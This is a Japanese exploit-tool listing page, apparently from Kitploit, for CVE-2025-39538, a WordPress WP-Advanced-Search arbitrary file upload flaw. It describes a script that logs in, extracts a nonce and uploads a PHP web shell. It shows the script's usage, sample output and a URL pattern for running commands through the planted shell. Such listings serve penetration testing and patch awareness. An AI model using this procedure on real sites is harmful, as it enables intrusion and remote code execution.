Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-39538 — WordPress WP-Advanced-Search <= 3.3.9.3 - 任意ファイルアップロードの脆弱性 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-39538
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubnxploited/cve-2025-39538

CVE-2025-39538

WordPress WP-Advanced-Search <= 3.3.9.3 - 任意ファイルアップロードの脆弱性

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🛡️ CVE-2025-39538 - WordPress WP-Advanced-Search <= 3.3.9.3 任意ファイルアップロード

CVE-2025-39538
公開日: 2025-04-16
脆弱性タイプ: 任意ファイルアップロード(危険なタイプのファイルの無制限アップロード)
影響を受けるプラグイン: Mathieu Chartier による WP-Advanced-Search
影響を受けるバージョン: 3.3.9.3 までの全バージョン

この脆弱性により、認証された攻撃者は、プラグインが提供するインポート機能を使用して、悪意のあるPHPファイル(ウェブシェルなど)をサーバーにアップロードできます。アップロードされたファイルはWordPressのアップロードディレクトリ配下に配置され、リモートコード実行につながる可能性があります。

🧱 アップロードパス:

root@kitploit:~
wp-content/uploads/2025/04/

⚙️ エクスプロイトスクリプトについて

このPythonスクリプトは以下の操作を行います:

  1. 提供された認証情報を使用してWordPressサイトにログインします。
  2. インポート/エクスポート管理ページから必要なwp_advanced_search_up_nonceを抽出します。
  3. 細工されたPOSTリクエストを介してウェブシェル(PHPファイル)をアップロードします。

🚀 使用方法

root@kitploit:~
usage: a.py [-h] -u URL -un USERNAME -p PASSWORD

CVE-2025-39538 - WP Advanced Search Arbitrary File Upload Exploit # By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://127.0.0.1/wordpress)
  -un, --username USERNAME
                        WordPress Username
  -p, --password PASSWORD
                        WordPress Password

🖥️ 出力例:

root@kitploit:~
[*] Attempting login...
[+] Logged in successfully.
[*] Fetching nonce from import/export page...
[+] Nonce extracted: 2140855687
[*] Attempting to upload shell...
[+] File uploaded (check wp-content/uploads or temp directory).

🐚 アップロードしたシェルの使用方法

アップロード後、以下のようにシェルにアクセスできます:

root@kitploit:~
http://target.site/wp-content/uploads/2025/04/nxploit.php?cmd=whoami

whoami を、実行したい任意のLinuxコマンドに置き換えてください。例:

  • id — 現在のユーザーIDを表示します。
  • pwd — 現在のディレクトリを表示します。
  • ls — ファイルを一覧表示します。

⚠️ 免責事項


このツールは教育目的および許可されたセキュリティテストのためだけに提供されています。
作者は、このスクリプトによって引き起こされた誤用や損害について一切責任を負いません。


By: Nxploited | Khaled Alenazi

ツールをダウンロード